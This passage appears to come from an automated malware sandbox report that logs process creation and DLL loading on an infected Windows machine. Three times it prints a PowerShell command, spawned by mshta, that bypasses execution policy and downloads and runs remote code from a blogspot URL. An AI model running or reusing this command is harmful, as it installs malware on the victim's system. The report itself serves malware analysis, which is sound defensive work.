                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 772Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 892Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr446F.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/42bc8076"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr524B.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/b0766183"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2504,i,7433291875497265033,6303917918567854472,262144 --variations-seed-version --mojo-platform-channel-handle=2628 /prefetch:3
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1628,i,15598181154832850491,9117469408654283260,262144 --variations-seed-version --mojo-platform-channel-handle=2364 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: drprov.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntlanman.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: davclnt.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: davhlpr.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
